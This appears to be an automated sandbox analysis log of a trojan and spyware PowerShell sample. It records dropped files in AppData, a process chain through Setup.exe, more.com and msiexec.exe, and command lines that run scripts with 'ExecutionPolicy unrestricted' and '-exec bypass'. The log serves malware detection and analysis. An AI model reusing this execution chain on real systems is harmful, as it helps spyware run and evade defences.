              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0

              System Summary

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File created: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File created: C:\Users\user\AppData\Roaming\FeGIPCnK\msvcr90.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File created: C:\Users\user\AppData\Roaming\FeGIPCnK\Resource.ct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File created: C:\Users\user\AppData\Roaming\FeGIPCnK\UpdateClient.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File created: C:\Users\user\AppData\Roaming\FeGIPCnK\python27.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File created: C:\Users\user\AppData\Roaming\FeGIPCnK\config.prx
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File created: C:\Users\user\AppData\Roaming\FeGIPCnK\UpdateCommon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File created: C:\Users\user\AppData\Roaming\FeGIPCnK\Data\d3dcompiler_47.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File created: C:\Users\user\AppData\Roaming\FeGIPCnK\NAudio.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File created: C:\Users\user\AppData\Roaming\FeGIPCnK\Data\Updater.ex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File created: C:\Users\user\AppData\Roaming\FeGIPCnK\RcClientBase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File created: C:\Users\user\AppData\Roaming\FeGIPCnK\Data\ffmpeg.dll
Source: Resource.ct.0.dr  Static PE information: Number of sections : 14 > 10
Source: UpdateClient.dll.0.dr, SimpleZip.cs  Cryptographic APIs: 'CreateDecryptor'
Source: UpdateClient.dll.0.dr, SimpleZip.cs  Cryptographic APIs: 'TransformFinalBlock'
Source: UpdateClient.dll.0.dr, SimpleZip.cs  Cryptographic APIs: 'TransformFinalBlock'
Source: UpdateCommon.dll.0.dr, SimpleZip.cs  Cryptographic APIs: 'CreateDecryptor'
Source: UpdateCommon.dll.0.dr, SimpleZip.cs  Cryptographic APIs: 'TransformFinalBlock'
Source: UpdateCommon.dll.0.dr, SimpleZip.cs  Cryptographic APIs: 'TransformFinalBlock'
Source: UpdateCommon.dll.0.dr, InstalledModule.cs  Cryptographic APIs: 'CreateDecryptor'
Source: classification engine  Classification label: mal100.troj.spyw.evad.winPS1@16/213@2/2
Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe  Code function: 6_2_00007FF764A16728 GetLastError,FormatMessageA,MessageBoxA,fwprintf,LocalFree
Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe  Code function: 3_2_00401540 FindResourceA,LoadResource,LockResource,_snprintf,LoadLibraryA,GetProcAddress,strncmp,strncmp,strncmp,UnmapViewOfFile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File created: C:\Users\user\AppData\Roaming\tGQPJYHH.zip
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Mutant created: NULL
Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3396:120:WilError_03
Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5480:120:WilError_03
Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4480:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tmfxg3z1.x0x.ps1
Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe  Command line argument: windows_exe  3_2_00401110
Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe  Command line argument: sys  3_2_00401110
Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe  Command line argument: _MessageBox  3_2_00401110
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown  Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: bUAmCazc.ps1  ReversingLabs: Detection: 15%
Source: Setup.exe  String found in binary or memory: sun/launcher/LauncherHelper
Source: Setup.exe  String found in binary or memory: -help
Source: unknown  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\bUAmCazc.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe "C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe"
Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe  Process created: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe
Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe  Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
Source: C:\Windows\SysWOW64\more.com  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\more.com  Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
Source: unknown  Process created: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe "C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe"
Source: C:\Windows\SysWOW64\msiexec.exe  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\B03VAGDV27AOWCK1I.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: acgenral.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: pla.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: pdh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: tdh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: wevtapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: shdocvw.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\more.comSection loaded: ulib.dllJump to behavior
              Source: C:\Windows\SysWOW64\more.comSection loaded: fsutilext.dllJump to behavior
              Source: C:\Windows\SysWOW64\more.comSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: shdocvw.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: acgenral.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: pla.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: pdh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: tdh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: wevtapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: shdocvw.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeAutomated click: OK
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeAutomated click: OK
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeAutomated click: OK
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: bUAmCazc.ps1Static file information: File size 35869954 > 1048576
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FeGIPCnK\msvcr90.dllJump to behavior
              Source: Binary string: C:\Users\Mark\code\github\NAudio\NAudio\obj\Release\net35\NAudio.pdb source: powershell.exe, 00000000.00000002.1992948747.000001AD686AE000.00000004.00000800.00020000.00000000.sdmp, NAudio.dll.0.dr
              Source: Binary string: C:\jenkins\workspace\dev\juno-win_live\build\cefSubProcess\pc64-vc-tool-opt\bin\EACefSubProcess.pdb source: Updater.ex.0.dr
              Source: Binary string: wntdll.pdbUGP source: Setup.exe, 00000003.00000002.1938482708.0000000003614000.00000004.00000001.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1937911745.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1938160688.0000000003260000.00000004.00000800.00020000.00000000.sdmp, more.com, 00000007.00000002.2193366185.0000000005330000.00000004.00001000.00020000.00000000.sdmp, more.com, 00000007.00000002.2185097182.0000000004E87000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580786924.0000000004CF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2581036694.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210939442.0000000002ED6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2211064893.0000000003230000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: Setup.exe, 00000003.00000002.1938482708.0000000003614000.00000004.00000001.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1937911745.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1938160688.0000000003260000.00000004.00000800.00020000.00000000.sdmp, more.com, 00000007.00000002.2193366185.0000000005330000.00000004.00001000.00020000.00000000.sdmp, more.com, 00000007.00000002.2185097182.0000000004E87000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580786924.0000000004CF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2581036694.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210939442.0000000002ED6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2211064893.0000000003230000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\Mark\code\github\NAudio\NAudio\obj\Release\net35\NAudio.pdbSHA256do source: powershell.exe, 00000000.00000002.1992948747.000001AD686AE000.00000004.00000800.00020000.00000000.sdmp, NAudio.dll.0.dr
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-x64-cygwin-sans-NAS\jdk8u381\237\build\windows-x64\jdk\objs\javaw_objs\javaw.pdb source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000006.00000000.1932096504.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmp, Setup.exe, 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

